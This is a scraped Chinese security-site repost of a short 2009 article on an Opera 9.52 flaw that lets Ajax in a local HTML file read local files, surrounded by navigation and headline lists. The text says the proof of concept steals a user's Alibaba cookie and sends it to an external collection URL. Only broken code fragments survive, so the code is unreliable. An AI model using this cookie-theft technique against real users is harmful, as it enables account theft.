最新更新
探索邮箱
诚聘英才
网通主站
电信镜像
加入收藏
设为主页
帮助中心
客服中心
探索主页
技术文章
视频教程
视频动画
软件下载
资源源码
会员加入
会员博客
在线课堂
安全中心
探索论坛
您的位置:探索安全网 >>
技术文章
>>文章正文
文章列表
【
字体
:
大
中
小
】 【
颜色
:
红
蓝
黑
】 背景:
Opera 9.52使用ajax读取本地文件漏洞
作者:探索编辑 文章来源:安全中国 点击数:170 更新时间:1/6/2009 9:01:05 AM
by 空虚浪子心
这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。
ff3没有这个漏洞。
不废话,看代码吧。
利用方式如下:
这段代码保存为本地htm文件,然后使用opera打开。
将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php
"framekxlzx" width=
0
height=
0
>
a.php代码:
$user_IP
=
(
网友评论
更多
用户名:
密码:
匿名发表
热点文章
中小手机生产商受困下乡渠道 产品
开机假死,都是偷懒惹的祸
史上最全面的解决死机故障方法大全
枚举登陆用户源代码
获取操作系统版本源代码
总结的php google ha
一键清除迅雷看看缓存文件
虚拟机vmware新手使用教程
64位PC需求量提升 驱使Vis
非洲TD商用网进入网络优化阶段
下一代iPhone三大实用功能抢
中医药管理局公布46家假中医药机
Gmail提供"后悔药
推荐文章
Vista市场份额达30% 一些
中电信2008年盈利预计将下降超
我的电脑本地连接图标不见了,无法
开机假死,都是偷懒惹的祸
史上最全面的解决死机故障方法大全
枚举登陆用户源代码
获取操作系统版本源代码
总结的php google ha
一键清除迅雷看看缓存文件
虚拟机vmware新手使用教程
64位PC需求量提升 驱使Vis
Gmail提供"后悔药
国内视频网站香港电影节抢版权
网站调查
关于探索 | 官方论坛 | 合作服务 | 免责声明 | 广告服务 | 诚征英才 |
网站导航
业务电话:0371-63311110 63311130 客服电话: 咨询QQ:76925
Copyright? 2008 tsaqw.com 版权所有
ICP证:渝ICP备08002364号
经营性网站许可证号:410199100038128